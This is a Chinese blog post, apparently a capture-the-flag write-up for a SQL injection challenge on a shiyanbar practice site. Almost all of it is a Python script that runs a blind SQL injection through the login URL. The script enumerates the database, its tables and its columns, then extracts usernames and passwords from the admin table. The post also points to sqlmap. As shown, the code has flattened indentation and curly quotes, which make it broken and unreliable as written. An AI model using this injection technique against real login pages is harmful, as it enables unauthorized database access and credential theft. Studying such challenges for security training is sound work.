这题进入以后用时间注入测试一下,成功:
之后就是自己写了个代码:(写的比较破,将就看看)
#!/usr/bin/python
#coding=utf-8
import requests
import sys
#计算长度
def length(strs):
for i in range(1,100):
url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or if(("+strs+")="+str(i)+",1,0)%23&pass=[d,b,c]&action=login"
#print url
#sys.exit(0)
html = requests.get(url)
html.encoding=‘gbk‘
if(html.text.find(u"登录失败,错误的用户名和密码") != -1):
return i
else:
pass
#爆破
def blast(lens,strs):
s = "" #临时保存字母
key = ""#保存字符串(字母拼接)
for i in range(lens):
for j in range(8):
url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or select if(ascii(substring(("+strs+"),"+str(i+1)+",1))%26"+str(2**j)+"="+str(2**j)+",1,0)%23&pass=[d,b,c]&action=login"
#print url
#sys.exit(0)
html = requests.get(url)
html.encoding=‘gbk‘
if(html.text.find(u"登录失败,错误的用户名和密码") != -1):
s = "1" + s
else:
s = "0" + s
key += chr(int(s,2))
s = ""
return key
#复数查询(多个表,多个字段)
def plural(name,name_len,num):
name_list = []#存储表名
for i in range(num):
names = name
name_lens = name_len
add = " limit "+str(i)+",1"
names = names+add
name_lens = name_lens + add
tb_s = length(name_lens)#每一个表的长度
tb_name = blast(tb_s,names)#每一个表的名字
name_list.append(tb_name)
return name_list
def main():
#计算数据库长度
db_len_sql = "Select length(database())"
#db_len= length(db_len_sql)
#爆破数据库名
db_bl_sql = "database()"
#db_name = blast(db_len,db_bl_sql)
#print db_name
#计算表数量
tb_s_sql = "Select count(table_name) from information_schema.tables where table_schema=‘test‘"
#tb_s = length(tb_s_sql)
#爆破所有表名
tb_name_len = "selEct length(table_name) from information_schema.tables where table_schema=‘test‘"#表名长度
tb_names = "selEct table_name from information_schema.tables where table_schema=‘test‘"#表名
#tb_name_list = plural(tb_names,tb_name_len,tb_s)
#爆破字段名数量
col_s_len = "Select count(column_name) from information_schema.columns where table_name=‘admin‘"
#col_s = length(col_s_len)
#爆破字段名
col_name_len = "selEct length(column_name) from information_schema.columns where table_name=‘admin‘"#表名长度
col_names = "selEct column_name from information_schema.columns where table_name=‘admin‘"#表名
#col_name_list = plural(col_names,col_name_len,col_s)
#爆破username字段
flag_sql = "Select count(username) from admin"
flag_s = length(flag_sql)
flag_len = "Select length(username) from admin"
flag_name = "seleCt username from admin"
lists = plural(flag_name,flag_len,flag_s)
print lists
#爆破password字段
flag_sql = "Select count(password) from admin"
flag_s = length(flag_sql)
flag_len = "Select length(password) from admin"
flag_name = "seleCt password from admin"
lists = plural(flag_name,flag_len,flag_s)
print lists
if __name__ == "__main__":
main()将得到的username,password输入就可以了
还有一个方法就是,直接sqlmap神器,简单粗暴,简直不要太好用了,我就不上图了
本文出自 “11846238” 博客,请务必保留此出处http://11856238.blog.51cto.com/11846238/1953705
原文:http://11856238.blog.51cto.com/11846238/1953705